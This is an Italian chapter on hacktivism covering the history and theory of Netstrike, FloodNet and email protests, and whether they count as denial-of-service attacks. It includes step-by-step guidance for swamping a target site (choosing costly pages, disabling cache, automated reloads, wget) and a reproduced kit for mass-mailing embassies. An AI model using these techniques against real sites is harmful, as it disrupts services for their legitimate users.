Hacktivism. La libertà nelle maglie della rete
di A. Di Corinto e T.Tozzi |
||
2.4.2.Infowar,
Netwar, Cyberwar |
||
A propaganda
war is a struggle where each group tries to win the favor of public
opinion.
Insieme al
Critical Art Ensemble, Ricardo Dominguez è stato fra i primi a teorizzare
la disobbedienza civile elettronica, una forma di azione diretta e
non violenta sulla rete telematica, che ha come obiettivo quello di
intralciare e bloccare i flussi dell’informazione commerciale e del
capitale finanziario. Azione che
si concretizza nell’occupazione di «entrate, uscite, passaggi e altri
spazi chiave della rete» per fare pressione su soggetti implicati
in azioni immorali o criminali. L’idea portante
di questa filosofia dell’azione diretta sulla rete è che, siccome
il potere diventa nomadico e globale, non essendo più legato né a
un luogo fisico, né ad un solo centro di controllo, le manifestazioni
di piazza, i picchetti, le petizioni e i boicottaggi da soli non sono
più sufficienti a contrastare le prevaricazioni di governi e corporations.
E poiché è
sempre più importante globalizzare la contestazione bisogna adottare
tecniche di guerriglia comunicativa su Internet – petizioni elettroniche,
sit-in virtuali, creazione di siti web a prova di censura, deturnamento
del messaggio politico e pubblicitario – sincronizzandole con le proteste
di piazza per dare l’occasione anche a chi non può essere fisicamente
presente alle proteste di fare sentire la propia opposizione. «In questo
modo l’utilizzo di Internet riduce i vantaggi che i grandi gruppi
hanno sempre avuto, cioè soldi, influenza e un accesso preferenziale
ai media, per imporre il proprio punto di vista» dice Paul Mobbs del
collettivo degli electrohippies. Questa è in
estrema sintesi la filosofia del «disturbo elettronico» elaborata
compiutamente dall’Electronic Disturbance Theater (Ecd). Gli ideatori
di questa particolare filosofia di protesta sono artisti dalle provenienze
più disparate che pensano l’arte del networking come un modo particolare
di essere socialmente attivi, hackers, artisti e persone qualunque,
tutti uniti alla ricerca di una nuova etica per la comunità elettronica. Sotto il profilo
teorico questo tipo di ricerca viene presentata tra il 1994 e il 1996
in due testi, The Electronic Disturbance e Electronic Civil Disobedience
(tradotti in Italia da Castelvecchi). La ricerca
combina diverse culture, da Deleuze e Guattari, a Baudrillard, Bataille,
Foucault, Debord, cercando però di immetterle in una nuova analisi
del potere nell’era di Internet e delle reti di comunicazione globale.
La teoria è che il potere ha assunto ormai una forma nomadica, è un
flusso elettronico di denaro che si sposta là dove trova i migliori
affari e i minori ostacoli e resistenze. La sua «sede reale» non è
più dunque la strada, il palazzo, o la città, ma il cyberspazio, ed
è su questo terreno che va affrontato 33. Da qui prende
corpo l’idea della disobbedienza civile elettronica, ad opera di una
nuova avanguardia che sappia coniugare la politicizzazione storica
dei gruppi di base – ecologisti, pacifisti, eccetera – con le nuove
competenze tecniche. Una nuova avanguardia, insomma, in cui hacker
e attivisti lavorino fianco a fianco, all’insegna di ciò che viene
chiamato ormai comunemente «hacktivism», sebbene l’idea sia ben più
remota e risalga alle pratiche degli anni Sessanta e Settanta. In pochi anni
Ricardo si è guadagnato la fama di apostolo dello zapatismo digitale
per aver realizzato insieme all’Ecd e alla Federation of Random Action
una serie di campagne di protesta a favore degli zapatisti messicani
sviluppando alcuni tools informatici per il disturbo elettronico.
Uno degli
strumenti più noti sviluppati dall’Electronic Disturbance Theater
è il Floodnet, evoluzione del Netstrike, il corteo telematico ideato
e teorizzato da T. Tozzi di Strano Network, che è stato inizialmente
realizzato per protestare contro i responsabili della riduzione alla
fame degli indigeni zapatisti. Si tratta
di un software scritto appositamente per rallentare la capacità di
risposta dei server web senza però arrecarvi danno, ma semplicemente
inondando il server di richieste di collegamento. Il «FloodNet»,
è un applet di Java che automatizza il processo di reload delle pagine.
I partecipanti al «sit-in virtuale» si connettono al sito di «The
Thing» e prelevano «FloodNet», che colpisce i siti ricaricando le
pagine con un intervallo di 6-7 secondi. «In questo modo, con una
connessione simultanea ad esempio di diecimila persone, riusciamo
a trasmettere circa 600 mila impulsi al minuto, che sono generalmente
sufficienti a bloccare l’accesso al sito», spiega Ricardo Dominguez. Come nel Netstrike,
anche nell’uso del Floodnet il blocco totale del sito è solo un effetto
collaterale della protesta che ha invece il suo primo obiettivo nel
far conoscere alle comunità presenti in rete un problema ignorato
o distorto dagli organi di informazioni ufficiali. Nel Floodnet come
nei netstrike quello che più conta è la comunicazione dei motivi e
degli obiettivi della protesta affinché le persone possano prendere
coscienza di fatti gravi come la violazione dei diritti nel proprio
paese o all’altro capo del mondo.
L’evento netstrike
è un atto simbolico e di fatto non ha nessun valore che il sito venga
effettivamente bloccato. Ciò che ha valore è qualcosa che sta da qualche
altra parte: ha valore la presa di coscienza da parte del maggior
numero di persone possibile intorno a questioni nodali. Ha valore
che tale presa di coscienza sia talmente alta e condivisa da sentirsi
in dovere di passare almeno un’ora del proprio tempo a protestare
con un mouse contro tali questioni. È essenziale che vi sia partecipazione.
Non è essenziale che il sito venga bloccato. E la partecipazione ha
poco a che fare con il netstrike in se, ovvero con l’evento di un’ora.
È in altri tempi e in altri luoghi che è essenziale lavorare. Non
ha senso passare ore a ipotizzare la realizzazione di un software
che aumenti l’ingombro di banda, anzi ritengo ciò qualcosa di mistificante,
non alla portata di tutti, scorretto e da evitare. Ciò che serve è
una pratica «sincera» e «facile». Non servono «trucchi» quando si
è dalla parte della ragione. Serve una pratica che ribalti i meccanismi
della delega e che renda ognuno attore sociale fornendogli la possibilità
di partecipare in prima persona su questioni nodali. Il netstrike
è dunque un evento simbolico e tale deve rimanere. Un evento di un’ora
su cui non vale la pena perdere tempo a prepararlo. È invece fondamentale
investire il massimo delle proprie energie a sensibilizzare il maggior
numero di persone coinvolgendole nell’evento. È fondamentale che la
notizia circoli e che la questione sia discussa nel maggior numero
di luoghi possibili. Il netstrike reale non è verso il sito, ma verso
altrove. Il netstrike è verso il circuito dei media che deve essere
costretto a presentare la notizia per far sì che se ne discuta. È
fondamentale investire il proprio tempo nel far circolare la notizia
e nel trovare corrispondenza negli altri rispetto ai nostri assunti.
L’obbiettivo non è bloccare un sito per un’ora, anzi se ciò non succede
è forse meglio. L’obbiettivo è la costruzione di un mondo migliore
e questo in ogni luogo ed in ogni situazione si renda possibile. Serve
la condivisione di un sentimento di gioia, di grande fratellanza,
di vite condivise, di storie che vivano insieme quel passaggio in
un nuovo millennio confrontandosi e incontrandosi su giudizi e passioni.
Il netstrike di per sé è qualcosa che chiunque può fare per i fini
più diversi. È per questo che deve esistere un sito ufficiale del
netstrike fatto da noi cui corrispondano dei valori su cui crediamo
sia giusto mobilitarci «anche» attraverso la forma netstrike. Altrimenti
il netstrike potrebbe essere usato dal fascista di turno e noi essere
confusi con esso 34.
Netstrike Il netstrike
viene definito così:
Il Netstrike
è una manifestazione di massa di dissenso civile pienamente legittima
e legale! È un’azione assolutamente legale perchè metaforicamente
è come se un giornale, una radio o una televisione andassero in tilt
perchè non sono in grado di soddisfare un improvviso aumento di richieste
della propria utenza; nessuno mette in atto alcun sistema di boicottaggio
ma tutt’insieme, sommando l’azione legittima e legale di navigare
sullo stesso sito alla stessa ora, rendono visibile un’espressione
di dissenso.
Breve storia
dei netstrike Nel 1989 T.
Tozzi teorizza l’idea dell’attivismo artistico in rete definendolo
«Hacker Art». Nel 1990 Hacker
Art diventa una Bbs intorno a cui successivamente si aggrega un nucleo
di persone dell’area artistica e dell’antagonismo (tra cui S. Sansavini
del Centro di Comunicazione Antagonista e Ferry Byte del Csa Ex-Emerson)
che nel 1993 dà luogo alla formazione del gruppo Strano Network. Il Netstrike
– chiamato così perchè suona bene in inglese, ma che in italiano va
tradotto con ‘corteo telematico’ e non letteralmente ‘sciopero telematico’
– nasce dall’associazione culturale StranoNetwork nell’ormai telematicamente
lontano 1995. T. Tozzi idea e propone un netstrike mondiale, che viene
organizzato da Strano Network contro ben dieci indirizzi in contemporanea
per protestare contro gli esperimenti nucleari francesi (erano i tempi
di Mururoa). È nata una
nuova pratica di arte in rete. A gennaio
del 1996 Strano Network organizza un netstrike contro il Governo Messicano
per protestare contro le politiche nel Chiapas. A maggio del
1996 viene organizzato con successo un netstrike da Strano Network
in favore di Mumja Abu Jamal e di Silvia Baraldini. Il server della
Casa Bianca si ingolfa fino a bloccarsi del tutto. Particolare
successo ha avuto anche il Netstrike promosso dall’Anonymous Digital
Coalition (1998), che ha bloccato alcuni siti finanziari messicani
in sostegno alla lotta zapatista: emozionante il clima che si respirava
dentro il canale irc di coordinamento (irc e e-mail sono forse le
principali vie di propaganda per questo tipo di mobilitazione) quando
veniva verificato in tempo reale il crollo della funzionalità dei
siti da bloccare in nome degli indios del chiapas. Nel settembre
del 1998 ha luogo uno dei netstrike meno riusciti. È il Netstrike
globale contro Zedillo, il Pentagono e la Borsa delle Merci di Francoforte
promosso dall’Electronic Disturbance Theatre con una forte partecipazione
italiana. Il netstrike non riesce in quanto i promotori consigliano
di utilizzare una applet java che viene a sua volta sfruttata da una
contro-applet java del Pentagono per mandare in crash la maggior parte
dei pc partecipanti all’azione. Nel dicembre
1998 Netstrike a favore del Centro Popolare Autogestito di Firenze
contro un sito della Coop che andrà in crash a metà percorso del netstrike.
Malgrado la piena riuscita tecnica ottiene scarsissimo risalto sulla
stampa. Nel maggio
1999 Netstrike contro la guerra nella ex-Jugoslavia. Il netstrike
tecnicamente non riesce ma la notizia circola molto sui giornali.
È uno di quei casi in cui comunque il netstrike raggiunge lo scopo
di far parlare di un determinato argomento. Nel giugno
2000, malgrado una apparente scarsa partecipazione, il Netstrike per
bloccare il sito dell’Ocse riesce verso la fine del tempo di mobilitazione
e il sito risulta inaccessibile anche per le 12 ore successive. È
uno di quei casi in cui viene proposta una nuova tecnica per portare
avanti il netstrike: concentrare l’attenzione sul locale motore di
ricerca per impegnare le risorse della macchina e renderla inutilizzabile.
È comunque
il netstrike milanese a segnare la svolta! Per solidarietà contro
gli sgomberi dei Csa milanesi il Loa riesce a convincere migliaia
di web-surfers a intasare il server del Comune di Milano per più di
tre ore (ottobre 2000). L’azione riesce completamente e convince definitivamente
ampi settori del movimento italiano dell’utilità di questo strumento
di protesta. C’è una ricaduta discreta sulla stampa locale e nazionale
e grazie al netstrike si scopre una grave mancanza del server del
Comune di Milano consistente nella messa online dei dati privati di
molti cittadini: la denuncia arriva anche al Garante della Privacy.
Il netstrike
nel frattempo viene adottato da numerose organizzazioni per gli obiettivi
più disparati (contro la tut, la Siae, ma anche contro la vivisezione!)
non solo in Italia (fra gli ultimi realizzati quello di Avana contro
la censura in Rete e quello di T. Tozzi e Giacomo Verde contro la
pena di morte), ma in tutto il mondo (Corea, Arabia Saudita, Medio
Oriente ecc.) come forma di mobilitazione dai toni più o meno accesi
e con risultati alterni. Così ne parla
A. Carola Freschi 35: «Da un punto di
vista giuridico, i promotori del netstrike si richiamano al diritto
di sciopero e al corteo pubblico pacifico. Il tipo di ‘intralcio’
creato dal corteo virtuale, diversamente per esempio dall’invio simultaneo
di lettere o e-mail, è funzionale alla visibilità dell’azione per
quanti cercano di entrare nel palazzo di fronte al quale si svolge
la manifestazione. La garanzia che questo effetto venga ricollegato
a un’azione di protesta pacifica viene cercata attraverso una copertura
adeguata da parte dei media, la circolazione di informazione su mailing
list, newsgroup, indirizzari e-mail; ma gli elementi chiave per la
riuscita dell’azione sono individuati non solo nelle sue condizioni
tecniche, ma anche nel suo retroterra organizzativo 36,
nella creazione di una rete di soggetti interessati alla protesta,
nel coordinamento con altre azioni in contemporanea sul territorio
(Tozzi, in «Netstrike, No Copyright, etc.», AAA Edizioni, 1996). I
netstrike, sia su questioni ‘locali’ che su temi ‘globali’, evidenziano
abbastanza bene come la rete diventi uno strumento di partecipazione
civile che non riconosce i modelli della rappresentanza politica territoriale.
Il netstrike è, di fatto, una forma di protesta che produce esiti
a partire dal coordinamento di singoli individui, indipendentemente
dalla loro appartenenza a organizzazioni e, soprattutto, in assenza
di un controllo organizzativo sull’azione. Come è stato osservato
a proposito delle potenzialità partecipative più generali della rete,
emerge qui lo spazio per una ‘presa di parola’ diretta degli individui.
Il netstrike rappresenta una proposta, una sperimentazione, un tentativo
in questa direzione, verso forme di partecipazione e di impegno civile
che passino per l’agire degli individui. A questi la rete, soprattutto
attraverso nuove forme di relazioni comunitarie, potrebbe forse restituire
una dimensione di azione come individui ‘sociali’, al posto della
condizione di individui ‘atomizzati’ – o perché totalmente isolati
rispetto a riferimenti di tipo collettivo, o perché del tutto intrappolati
nelle dinamiche massificanti delle organizzazioni di tipo verticistico
37 ». www.netstrike.it
Netstrike
– Istruzioni per l’uso
Come organizzarlo? Sono pochi
gli accorgimenti necessari per organizzare un netstrike: – Scegliere
un bersaglio significativo per le rivendicazioni in funzione delle
quali il netstrike è stato indetto – Redigere
un appello, possibilmente in più lingue, da far circolare un po’ ovunque,
contenente: – ora e data
del netstrike – sito bersaglio
– motivazioni
e contesto in cui il netstrike è stato indetto – suggerimenti
per la realizzazione del netstrike (che si trovano abbondantemente
sul sito) – Navigare
molto estesamente il sito bersaglio per individuare: – Motori di
ricerca (parecchio onerosi per la Cpu della macchina bersaglio) – Pagine particolarmente
leggere (solo testo) per consentire un alto numero di richieste successive
della stessa pagina – Pagine particolarmente
ricche di elementi diversi (soprattutto immagini) per consentire un
alto numero di richieste di collegamento in seguito alla richiesta
di una singola pagina – Altre chicche
e distrazioni di chi gestisce la macchina bersaglio in modo da poterle
sfruttare – Definire
un ambito di coordinamento e di relazione sullo svolgimento della
protesta (spesso un canale IRC e/o una mailing list Cosa fare
per partecipare a un Netstrike: – nel msg
di convocazione del netstrike da inviare a organizzazioni, personaggi
e media specificare i rispettivi orari di partecipazione per ogni
singolo paese partecipante e richiedere la ridifussione dello stesso
msg in ogni maniera possibile – coordinarsi
tramite ml e in tempo reale tramite irc ~ #hackit99 – Reload continuamente
sul link interessato – aprire quanti
più browser possibili e da ognuno caricare le pagine interessate – Non impostare
proxies per il browser – settare
a 0 le memorie cache del browser – scrivere
procedure con qualsiasi linguaggio (per esempio in html frames+refresh)
che consentano ri-caricamenti automatici delle pagine da intasare
– utilizzare
programmi come teleport oppure wget che permettono lo scaricamento
di più pagine del sito da bloccare.
Problematiche Poiché il
netstrike utilizza gli stessi strumenti che i navigatori usano abitualmente
per navigare, è difficilmente interpretabile come un’azione di sabotaggio.
Le tecniche da considerare «conformi» allo spirito originario del
nestrike sono quelle per cui non ci può essere prova e capacità di
distinzione durante il nestrike fra chi sta scaricando un sito per
consultarlo e chi per bloccarlo. Una interpretazione forzata dell’illegittimità
del netstrike è stata avanzata da chi considera illegale l’utilizzo
e la scrittura di programmi, come nel caso degli script in linguaggio
java, in grado di automatizzare la procedura di reload della pagina
o del servizio bersaglio delle richieste che possono determinare il
collasso temporaneo della macchina che eroga il servizio. Tuttavia i
fautori del netstrike hanno a più riprese precisato che anche qualora
sia un javascript o un altro programma informatico artigianale che
porta il computer del navigante a unirsi al corteo ottimizzando l’uso
della banda del suo modem, va sottolineato che si tratta pur sempre
della «banda del modem» del navigante, notoriamente più stretta rispetto
a quella che normalmente è a disposizione di un server. Nello specifico,
il javascript è un programma eseguito «client side» e cioè sul computer
e sulla banda del navigante. Questo programma non potrebbe mai essere
usato da un utente singolo per rallentare un sito, per il limite oggettivo
rappresentato dalla banda a disposizione del modem. Se si considerano
queste argomentazioni il netstrike si configura come una protesta
la cui incisività è direttamente proporzionale alla partecipazione
dei cyber-citizens: lo strike è portato avanti sul piano dell’occupazione
di banda, e la banda a disposizione dei naviganti, qualunque sia il
software utilizzato nell’unirsi alla protesta, è ridotta alle capacità
di un normale modem, analoga alla presenza di un singolo manifestante
per la strada e come tale non perseguibile.
Breve storia
del Floodnet Il Floodnet
è il risultato della ricerca di artisti digitali di ogni parte del
mondo già familiari con i percorsi della critica radicale culturale
e politica ospitati sulla mailing list di «NetTime» e dal «Teatro
di Disturbo Elettronico», attivo dall’inizio del 1998 nell’organizzazione
dei netstrike in supporto della causa zapatista. Ricardo Dominguez
fonda nel 1987 con altri il «Critical Art Ensamble», una cellula di
radical con competenze assai diverse, che utilizzano media diversi
(video, grafica, teatro, produzione di testi fatti a mano) per realizzare
azioni-lampo in strade, gallerie, ospedali, stazioni e altri spazi
pubblici. «La fine degli
anni Ottanta», racconta Ricardo Dominguez, «fu un momento di grande
fertilità perché entrammo rapidamente in connessione con altre formazioni
affini a noi come ‘Group Material’ o come ‘Act Up’, che cercavano
di socializzare l’urgenza della questione Aids attraverso interventi
negli ospedali o nel corso delle dirette televisive di grande richiamo.
Ma, dopo la fiammata iniziale, questo tipo di azioni è diventata rapidamente
obsoleta, non più in grado di attrarre l’interesse dei media e dell’opinione
pubblica. Così all’inizio degli anni Novanta alcuni di noi hanno iniziato
a sentire la necessità di cercare nuove connessioni, sfruttando al
meglio le potenzialità offerte dalle nuove tecnologie e dalla Rete». «All’inizio
del 1998 – racconta Ricardo Dominguez – The Thing ricevette un messaggio
da un gruppo italiano, firmato Digital Anonymous Coalition, che invitava
a fare un sit-in virtuale, definendolo netstrike, cioè a una connessione
simultanea da diverse parti del mondo ai siti della Borsa messicana
e di altri quattro gruppi finanziari direttamente impegnati in Chiapas.
Il messaggio invitava anche a premere ripetutamente il tasto reload
delle pagine web per impedire l’accesso ad altri utenti». Un tipo
di pratica non dissimile da quella del picchettaggio di un edificio,
con la differenza che, in questo caso, anziché bloccare l’ingresso
delle persone si blocca il flusso di informazioni. A partire
dal 10 aprile del 1998, data della prima azione, il «Teatro di Disturbo
Elettronico» ha organizzato una decina di azioni che hanno colpito
diversi siti (quello del Presidente Zedillo, la Casa Bianca, la Borsa
messicana). I risultati sono stati alterni a seconda del numero dei
partecipanti e dell’ampiezza e della capacità di resistenza del server
ospitante il sito. Ma il dato più significativo è stata la reazione
di alcune delle organizzazioni colpite. In particolare, durante l’azione
«Swarm», il Pentagono, che era uno dei tre siti prescelti insieme
a quello di Zedillo e della Borsa di Francoforte, ha approntato una
contromisura, un «hostile applet», lanciandola contro «FloodNet» e
rendendolo almeno in parte inefficace. «FloodNet
è stato creato da un gruppo di artisti digitali, e le nostre azioni
hanno un significato simbolico: tutti i giorni milioni di persone
si connettono in tutto il mondo, ma noi decidiamo di farlo coscientemente,
in un determinato momento e lo dichiariamo apertamente – dichiara
Carmin Karasic, che ha curato la parte grafica di “FloodNet” –; io
credo che sia questo a spaventare i controllori del cyberspazio, molto
più dell’eventualità che noi possiamo crashare un sistema, che è del
tutto inesistente». Certo, non
tutti sono convinti che la disobbedienza civile elettronica rappresenti
il futuro della lotta politica. In un messaggio arrivato recentemente
sulla mailing list di «NetTime», un esponente di «Reclaim the street»,
da sempre impegnata nell’organizzare dimostrazioni e feste di piazza,
criticava l’idea che la resistenza potesse crescere e svilupparsi
cliccando sul mouse del proprio computer. «Io credo», replica Dominguez,
«che questa critica derivi da un’interpretazione errata della nostra
espressione “il potere non risiede più nelle strade”. Si trattava
di un gesto retorico che serviva a iniziare una discussione su questo
nuovo movimento. Serve ora solo una griglia temporale in cui gli attivisti,
i performer, gli hacker riescano a condividere il tempo. Quello che
posso fare con “Floodnet”, ad esempio, è avviare il computer, colpire
un sito, poi chiudere la porta e scendere in piazza a manifestare,
mentre il mio agente virtuale continua a lavorare da casa». Nel 1998 gruppi
di base e organizzazioni pacifiste si sono date appuntamento davanti
alla sede della «School of Americas», una scuola del South Carolina
dove si addestrano gruppi paramilitari anti-guerriglia per il Centro
e il Sud America. Mentre migliaia di manifestanti convenivano davanti
all’edificio della scuola, i partecipanti del «FloodNet» hanno intasato
l’accesso al sito web e il «Teatro di Disturbo Elettronico» ha reso
pubblico il codice eseguibile del «FloodNet» http://www.thing.net/~rdom
38 Il codice
del Floodnet è stato rilasciato il primo Gennaio 1999 unitamente all’applicazione
client-side (lato utente), per realizzare la protesta eletttronica
dal proprio computer e permetter a tutti di partecipare direttamente
alla protesta evitando di sovraccaricare il server di appoggio o di
esporlo a un controattacco come accadde nell’operazione Swarm. Il fatto che
la protesta divenga globale e locale, che sia trasparente, che unisca
azioni reali e virtuali, utilizzando semplici strumenti informatici
di tipo open source, la dice lunga sulla filosofia di questo tipo
di «attacchi». Ricardo, che
è stato anche minacciato da presunti agenti dei servizi di sicurezza
governativa messicani mentre alloggiava in un albergo austriaco, ha
rilasciato insieme ad altri attivisti strumenti di cyberprotesta sulla
rete come la lavagna floodnet usata nella recente contestazione al
Free Trade Area of the Americas (2001), un software che permette di
replicare il meccanismo del floodnet semplicemente disegnando su di
una tavolozza bianca dentro una pagina web; ad ogni movimento del
cursore corrisponde la chiamata a un numero Ip di un web-server che,
come abbiamo spiegato, tende a collassare in seguito a chiamate reiterate
e massive, dopo che l’Electronic Disturbance Theater ha elaborato
un programma di port scanning 39 noto
come Zapatista tribal port scan code per la realizzazione di manifestazioni
di protesta digitale a favore degli zapatisti. www.thing.net/~rdom/ecd/ecd.html Dominguez
sostiene che la Disobbedienza Civile Elettronica può essere distinta
in tre differenti pratiche: gli attacchi fisici alle macchine informatiche
– per intenderci quelli che hanno causato il famoso blocco di siti
come Amazon ed E-bay – gli attacchi sintattici, che consistono nel
replicare l’outfit formale di un messaggio ricombinandolo in maniera
tale da svelare la natura del potere dell’informazione – è il caso
della clonazione dei siti dell’Ocse www.ocse.org e del Wto, www.gatt.org
– e gli attacchi semantici, che mirano alla costituzione di un nuovo
immaginario, per affermare il primato dell’umanità rispetto alle esigenze
del profitto. Queste pratiche
ricordano la filosofia degli Rtmark: «attaccare tutto quanto è definibile
come umano senza alcun ferimento fisico».
Attacchi fisici,
Attacchi sintattici, Attacchi semantici Per i motivi
detti sopra, il Floodnet e il Nestrike sono quindi il punto d’arrivo
di una teoria che alla virtualizzazione del potere oppone la virtualizzazione
della protesta secondo il concetto di Disobbedienza Civile Elettronica
(Dce), nel caso del Critical Art Ensemble, oppure di Hacker Art, nel
caso di T. Tozzi. Tuttavia,
il Netstrike www.netstrike.it e il floodnet www.thing.net pur essendo
forme di protesta politica a metà strada fra le campagne di informazione
e l’arte della contestazione, sono stati associati al sabotaggio informatico
in quanto capaci di interrompere il flusso comunicativo di un nodo
specifico della rete. Alcuni consulenti
per la sicurezza informatica li considerano entrambi denial of service
attacks, cioè modalità di attacco informatico che impediscono ad una
macchina di erogare un servizio bloccandone l’accesso ai legittimi
utilizzatori, e li classificano come atti di sabotaggio al pari degli
smurf attacks in cui un computer ponte (pc zombi) viene utilizzato
all’insaputa degli amministratori per oberarne un altro con «junk
messages» o «fake requests» e «farlo collassare». In realtà
non è così. Ciò che distingue
il Netstrike e il Floodnet dal sabotaggio propriamente detto è il
loro carattere pacifico, pubblico, transitorio e la contestualizzazione
all’interno di un’azione di protesta più generale che serve a suscitare
attenzione e dibattito intorno a un certo tema (come il Massive Media
Attack, cioè l’uso integrato e contemporaneo di pratiche di culture
jamming 40, phone-strike, fax-strike,
net-strike, Sms-strike, petizioni, email, annunci radio, video; oppure
l’Anti-netstrike che invita al boicottaggio dei servizi e la rimozione
dei links dei siti verso cui si protesta), L’idea alla
base del netstrike, (poi ripresa nel floodnet) è quella di realizzare
dei sit-in virtuali. La dinamica con cui si sviluppa è sempre quella
di far convergere su un sito web un numero di utenti tale da creare
un rallentamento nell’accesso al sito stesso e la logica cui si ispira
è quella dei sit-in di strada che hanno l’effetto di rallentare il
traffico di uomini e mezzi. L’obiettivo
è quello di manifestare il proprio dissenso in maniera simbolica,
spesso in concomitanza con proteste di altra natura, nelle strade,
nelle scuole e negli uffici pubblici. Come i sit-in
di strada anche i sit-in virtuali «non provocano danni al pavimento»
e, come quelli, inducono i passanti a porsi delle domande per il fatto
stesso che ci sono, per avviare una comunicazione con i passanti stessi
e destare l’attenzione dei media. I sit-in virtuali
sono solo una leva simbolica per suscitare l’attenzione distratta
delle persone e la loro natura digitale, come le modalità di attuazione,
devono essere considerate solo un fattore secondario rispetto ai motivi
della protesta. Quello che
conta in un netstrike insomma, non è l’efficienza tecnica ma l’efficacia
simbolica e comunicativa.
D-Dos e Break-In Importante
distinzione da fare per quanto riguarda gli attacchi fisici è quella
fra i Denial of service attacks (DoS) e i Break-in veri e propri. Se i DoS hanno
in genere l’obiettivo di bloccare le comunicazioni dell’avversario,
i break-in hanno come scopo quello di «ottenere un accesso» ai sistemi
di comunicazione avversari, da sfruttare subito o successivamente
per trafugare e distruggere dati, sorvegliare e monitorare i flussi
della comunicazione a fini di spionaggio industriale e politico. Dalla descrizione
del floodnet e del netstrike si comprende che tali forme di protesta
non sono assimilabili al sabotaggio informatico che rientra invece
nella categoria degli attacchi fisici che danneggiano macchine, dati
e infrastrutture, e riguarda piuttosto pratiche come la diffusione
dei virus, il mailbombing, il synflood, il ping-sweep, gli smurf attacks,
e tutte le altre forme di denial of service propriamente dette che
mirano a bloccare il funzionamento delle infrastrutture di comunicazione
del target. Perciò, mentre
il netstrike è una pratica «ancora legale», le pratiche di attacco
vero e proprio non lo sono affatto. Mentre al
netstrike può partecipare un qualsiasi utente di Internet, usando
i normali programmi che la rete mette a disposizione, gli attacchi
fisici intrusivi prevedono una complessa pianificazione che comincia
col processo di «hiding» (mascheramento), e procede attraverso la
fase di «information gathering» (raccolta di informazioni), per proseguire
con l’attacco vero e proprio. Se la fase
di hiding presuppone la capacità di dissimulare la propria presenza,
origine e identità sulla rete, utilizzando sistemi-ponte (come quelli
che si usano negli smurf attacks), cioè computer non direttamente
legati all’obiettivo, la fase di information gathering è in genere
propedeutica alla rilevazione di vulnerabilità e malconfigurazioni
dei sistemi bersaglio. Per questo
è stato detto che:
Un attacco
è in genere un programma volto a sfruttare un malfunzionamento di
un altro programma (in genere un programma che gira su un server che
fornisce un servizio: web, ftp, mail, ecc.), sfuttandone i ‘bug’ per
provocare il blocco del servizio verso cui è lanciato o il blocco
dell’intero sistema. Ne nascono
ogni giorno perché ogni giorno vengono scovati nuovi ‘bugs’ nei programmi,
e questo non è sempre considerato negativo poiché questo induce a
‘irrobustire’, migliorare, i programmi che girano sui server; la sicurezza
totale non esiste mai, come si dice, l’unico computer sicuro è il
computer spento (Mag-one).
Anzi, molti
degli attacchi vengono realizzati con i software sviluppati per testare
la vulnerabilità dei sistemi che spesso sono diffusi e disponibili
liberamente in rete.
Va poi detto
che i server (ma anche le workstation) che usano sistemi operativi
basati su free software sono quelli che reagiscono meglio ai problemi
di sicurezza che si creano giorno per giorno proprio per la loro natura
open source, cioè, essendo i sorgenti (i listati dei programmi) disponibili
all’umanità, di solito nel giro di qualche ora il problema viene patchato
(una ‘patch’ è una modifica al programma che serve per correggere
il ‘bug’). Nel caso di
un sistema chiuso come MSwindows, solo i programmatori originari,
che sono gli unici detentori del codice sorgente (microsoft) possono
correggere il problema e nell’unico modo che loro ritengono giusto...
non c’è un confronto tra milioni di programmatori come c’è su internet
per il free software (dalla Mailing list avana@kyu77.org).
Questa idea
è infatti proprio alla base della filosofia della «full disclosure»
dei problemi della sicurezza, concettualmente opposta alla strategia
della «security trough obscurity» e alle forme di nascondimento o
di censura del codice di attacco. Ma i bachi
remoti non sono l’unica strada. La presenza di servizi non sorvegliati,
come un finger aperto, in genere permette l’ingresso nel sistema.
Mail Manifestazione La mail-manifestazione
o corteo di email è una forma di contestazione che consiste nell’inviare
un elevato numero di messaggi ad uno stesso indirizzo per protestare
contro il comportamento di istituzioni o aziende ovvero per sollecitare
l’intervento di associazioni e autorità su una questione di interesse
pubblico. La prima mail-manifestazione in Italia è stata quella contro
il blocco della attività del server di “Isole nella rete” nel 1998.
Il sequestro del server fu richiesto dall’autorità giudiziaria in
quanto su una delle mailing lists pubbliche e non moderate ospitate
dal server comparve un messaggio che invitava al boicottaggio di prodotti
turchi e delle agenzie turistiche turche presenti in territorio italiano
per protestare contro la pulizia etnica del popolo curdo. www.ecn.org
Ecco il messaggio
con le istruzioni per la mail-manifestazione diffuso in quell’occasione:
Contro il
sequestro del server www.ecn.org Questo kit
per la protesta elettronica serve a organizzare AL PIÙ PRESTO una
campagna di protesta e controinformazione sull’operazione di polizia
della repubblica delle banane contro il server alternativo «isole
nella rete» (www.ecn.org) compiuta il 27 giugno. Parigi, 29
giugno 1998 Collettivo kom(inter)net european counter network – panama
e-mail: ecn-paname@altern.org
http://www.altern.org/ecn Caratteristiche Voi trovate
qui: 1- Le istruzioni per la mail-manifestazione (parte 1). 2- La
lista degli indirizzi e-mail di tutte le ambasciate, consolati e centri
culturali italiani nel mondo (parte 1) 3- Il comunicato di protesta
di Isole Nella Rete in italiano, francese, inglese, tedesco, spagnolo,
da inviare alle «officine della repubblica bananiera», ma anche da
fare circolare nelle reti alternative (parte 2) Motivazioni A tutti quelli
che si oppongono ai deliri di sicurezza degli Stati che intendono
controllare la comunicazione elettronica, a tutti quelli che vogliono
difendere la libertà di parola, d’informazione e di espressione nelle
reti, noi proponiamo di lanciare IMMEDIATAMENTE una campagna di protesta
via e-mail, allo scopo di far sentire la nostra voce in tutto il mondo...
e di intasare qualche sito elettronico di burocrati italiani... raggruppandoci
in un corteo virtuale di e-mail incazzate. Istruzioni Istruzioni
per l’uso; Il principio della mail-manif è semplice, è sufficente
raggrupparsi VELOCEMENTE in corteo di e-mail convergendo verso le
caselle postali elettroniche dei rappresentanti della repubblica delle
banane. 1) Duplicate
tre volte il messaggio contenente le versioni del comunicato. O se
preferite, fate il vostro messaggio di protesta (se possibile abbastanza
lungo) e preparate l’invio come descritto precedentemente. 2) In ognuno
dei messaggi, incollate (nel campo «bcc» è meglio, dato che maschera
la lista dei destinatari) uno dei tre blocchi d’indirizzi proposti
qui sotto. 3) Spedite!
Potrà essere un po’ lunga... Ma sarà peggio per i destinatari. 4) Se vi resta
un po’ di tempo (in particolare per chi risiede in Francia) ... potete
suggerire a qualche amico i seguenti obiettivi: – Per fax
il 01.45.48.82.40 (servizio stampa dell’ambasciata) – Per telefono
il 0.49.54.03.03 (ambasciata) o lo 01.49.54.03.86 (servizio stampa
dell’ambasciata). – Per mail:
PS Se agite dal posto di lavoro dove la paranoia vi attanaglia, potete
comunque procedere a partire da un remailer anonimo (nessuna traccia
